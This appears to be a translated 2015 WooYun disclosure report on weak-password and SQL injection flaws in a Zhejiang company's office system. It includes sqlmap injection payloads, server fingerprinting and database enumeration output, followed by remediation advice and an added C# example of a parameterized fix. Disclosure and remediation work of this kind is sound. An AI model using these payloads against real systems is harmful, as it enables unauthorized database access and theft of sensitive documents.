WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online browsing--------http://drop.zone.ci/
2015-11-29: Details have been sent to the vendor and are awaiting vendor handling
2015-12-03: Vendor has confirmed; details disclosed to the vendor only
2015-12-13: Details disclosed to core white hats and experts in the relevant field
2015-12-23: Details disclosed to regular white hats
2016-01-02: Details disclosed to intern white hats
2016-01-17: Details disclosed to the public
Zhejiang Construction Investment Group office system vulnerability bundle (weak password + SQL injection)
http://**.**.**.**/zjjtoa/
Weak-password user:
After logging in to the workbench, a large number of sensitive documents are exposed: notices and announcements, personnel appointments and dismissals, meeting minutes, and so on.
In addition, there are many SQL injection points; essentially every parameter is injectable. The vendor should carry out a full audit on its own. For example: http://**.**.**.**/zjjtoa/workasp/COA_File/COA_SendFile/OpenFile.aspx?FileID=4599
GET parameter 'FileID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Parameter: FileID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: FileID=4606 AND 1307=1307

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: FileID=4606 AND 8424=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8424=8424) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113)))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: FileID=4606; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: FileID=4606 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: FileID=(SELECT CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8121=8121) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(120)+CHAR(113))
---
[22:56:58] [INFO] testing Microsoft SQL Server
[22:56:58] [INFO] confirming Microsoft SQL Server
[22:56:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[22:56:59] [INFO] fetching database names
[22:56:59] [INFO] the SQL query used returns 5 entries
[22:56:59] [INFO] retrieved: master
[22:56:59] [INFO] retrieved: model
[22:56:59] [INFO] retrieved: msdb
[22:56:59] [INFO] retrieved: tempdb
[22:56:59] [INFO] retrieved: zjjtoa
available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] zjjtoa
The zjjtoa database contains more than 800 tables, as follows
Change the password, add a CAPTCHA to the login, and fix the SQL injection
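As an added illustration of the SQL injection fix (this is not code from the report or from the vendor's application), the string-concatenation pattern that makes a parameter like FileID injectable is shown beside a version that validates the value as an integer and binds it as a typed ADO.NET parameter; the table name, column name and handler shape are assumptions.

```csharp
// Added example, not the vendor's code. Assumes a handler like OpenFile.aspx that
// resolves a file row by the FileID query-string value against SQL Server.
// Table and column names (COA_SendFile, FilePath) are hypothetical.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public static class FileLookup
{
    // Vulnerable pattern: the raw query-string value is pasted into the SQL text, so a
    // value such as "4606 AND 1307=1307" or "4606; WAITFOR DELAY '0:0:5'--" becomes part
    // of the statement. This is the shape sqlmap's boolean, stacked and time-based
    // findings above point to.
    public static string BuildUnsafeQuery(string rawFileId)
    {
        return "SELECT FilePath FROM COA_SendFile WHERE FileID = " + rawFileId;
    }

    // Hardened version: reject anything that is not a positive integer before it reaches
    // the database, then bind the value as a typed parameter so it can never change the
    // statement. (Callers should additionally check that the current user is allowed to
    // read this file; the report shows sensitive documents behind a weak login.)
    public static string GetFilePath(SqlConnection conn, string rawFileId)
    {
        int fileId;
        if (!int.TryParse(rawFileId, out fileId) || fileId <= 0)
            throw new HttpException(400, "Invalid FileID");

        const string sql = "SELECT FilePath FROM COA_SendFile WHERE FileID = @FileID";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@FileID", SqlDbType.Int).Value = fileId;
            object result = cmd.ExecuteScalar();
            if (result == null || result == DBNull.Value)
                throw new HttpException(404, "File not found");
            return (string)result;
        }
    }
}
```

The same two rules (type-validate every identifier-style parameter, never concatenate request data into SQL) apply to every other injectable parameter the report says exists; a parameterized query also makes the database error messages sqlmap used for the error-based finding unreachable from user input.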
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-12-03 17:56
CNVD confirmed and reproduced the described vulnerability; it has been forwarded by CNCERT to the Zhejiang branch center, which will coordinate follow-up handling with the website's operating unit.
None